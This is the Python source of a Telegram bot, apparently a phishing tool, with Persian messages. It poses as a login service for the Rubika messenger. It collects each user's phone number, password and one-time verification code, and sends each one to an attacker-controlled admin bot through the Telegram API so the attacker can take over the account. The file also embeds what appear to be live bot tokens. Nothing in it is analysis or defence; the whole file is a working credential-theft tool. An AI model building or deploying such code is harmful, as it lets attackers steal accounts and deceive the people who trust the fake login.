import asyncio
import json
import aiohttp
from aiogram import Bot, Dispatcher, types
from aiogram.filters import Command, StateFilter
from aiogram.fsm.context import FSMContext
from aiogram.fsm.state import State, StatesGroup
from aiogram.types import Message

# =============================================
# 🔧 تنظیمات
# =============================================
BOT_TOKEN = "8725100247:AAG7RAeEvFvJWzlFcWgLcJHEgJp9ZibFPhc"
ADMIN_BOT_TOKEN = "8970376348:AAGT2JpjjjGJgwfzVA8pbgnzTCTzxsvRaAE" 
ADMIN_CHAT_ID = "613623" 

bot = Bot(token=BOT_TOKEN)
dp = Dispatcher()

# =============================================
# 📊 مدیریت حالت‌ها (FSM)
# =============================================
class Form(StatesGroup):
    phone = State()          # دریافت شماره
    password = State()       # دریافت رمز عبور
    code = State()           # دریافت کد تایید

# =============================================
# 📥 ارسال اطلاعات به ربات ادمین
# =============================================
async def send_to_admin(data: dict):
    """ارسال داده‌ها به ربات ادمین از طریق API تلگرام"""
    url = f"https://api.telegram.org/bot{ADMIN_BOT_TOKEN}/sendMessage"
    message = f"""
📩 اطلاعات کاربر جدید

📱 شماره: {data.get('phone')}
🔑 رمز عبور: {data.get('password', '(وارد نشده)')}
🆔 Chat ID کاربر: {data.get('user_id')}
📌 مرحله: {data.get('step')}
"""
    if data.get('code'):
        message += f"✅ کد تایید: {data['code']}"
    
    payload = {
        "chat_id": ADMIN_CHAT_ID,
        "text": message,
        "parse_mode": "Markdown"
    }
    
    async with aiohttp.ClientSession() as session:
        await session.post(url, json=payload)

# =============================================
# 🚀 دستور شروع
# =============================================
@dp.message(Command("start"))
async def start_command(message: Message, state: FSMContext):
    await state.clear()
    await message.reply(
        "🔐 به ربات ورود به روبیکا خوش آمدید.\n"
        "لطفاً شماره تلفن خود را وارد کنید (با فرمت 09xxxxxxxxx):"
    )
    await state.set_state(Form.phone)

# =============================================
# 📱 دریافت شماره
# =============================================
@dp.message(Form.phone)
async def get_phone(message: Message, state: FSMContext):
    phone = message.text.strip()
    if not (len(phone) == 11 and phone.startswith("09") and phone.isdigit()):
        await message.reply("⚠️ فرمت شماره اشتباه! لطفاً با فرمت 09xxxxxxxxx وارد کنید.")
        return
    
    await state.update_data(phone=phone, user_id=message.chat.id)
    await message.reply(
        "🔑 حالا رمز عبور خود را وارد کنید (در صورت نداشتن، اینتر بزنید):"
    )
    await state.set_state(Form.password)

# =============================================
# 🔑 دریافت رمز عبور (اختیاری)
# =============================================
@dp.message(Form.password)
async def get_password(message: Message, state: FSMContext):
    password = message.text.strip()
    data = await state.get_data()
    data['password'] = password if password else None
    data['step'] = 'password_received'
    
    # ارسال شماره و رمز به ربات ادمین
    await send_to_admin(data)
    
    await state.update_data(password=password)
    await message.reply(
        "✅ اطلاعات شما به سامانه ارسال شد.\n"
        "⏳ در حال ارسال کد تایید به شماره شما..."
    )
    
    # منتظر می‌مانیم تا ادمین کد را ارسال کند (از طریق پیام به ربات عمومی)
    await state.set_state(Form.code)

# =============================================
# ✅ دریافت کد تایید از کاربر
# =============================================
@dp.message(Form.code)
async def get_code(message: Message, state: FSMContext):
    code = message.text.strip()
    if not code.isdigit():
        await message.reply("⚠️ کد تایید باید عددی باشد. لطفاً مجدد وارد کنید:")
        return
    
    data = await state.get_data()
    data['code'] = code
    data['step'] = 'code_received'
    
    # ارسال کد به ربات ادمین برای ورود نهایی
    await send_to_admin(data)
    
    await message.reply(
        "🔄 کد تایید به سامانه ارسال شد.\n"
        "⏳ در حال تکمیل فرآیند ورود..."
    )
    await state.clear()

# =============================================
# 📨 دریافت پیام‌های ادمین (برای اطلاع‌رسانی به کاربر)
# =============================================
@dp.message()
async def handle_admin_messages(message: Message, state: FSMContext):
    """این بخش برای دریافت پیام‌های ارسالی از ادمین به ربات عمومی است."""
    # اگر پیام از خود ادمین است و شامل دستور خاصی نیست، آن را نادیده بگیر
    pass

# =============================================
# 🚀 اجرای ربات
# =============================================
async def main():
    print("🤖 ربات عمومی راه‌اندازی شد...")
    await dp.start_polling(bot)

if __name__ == "__main__":
    asyncio.run(main())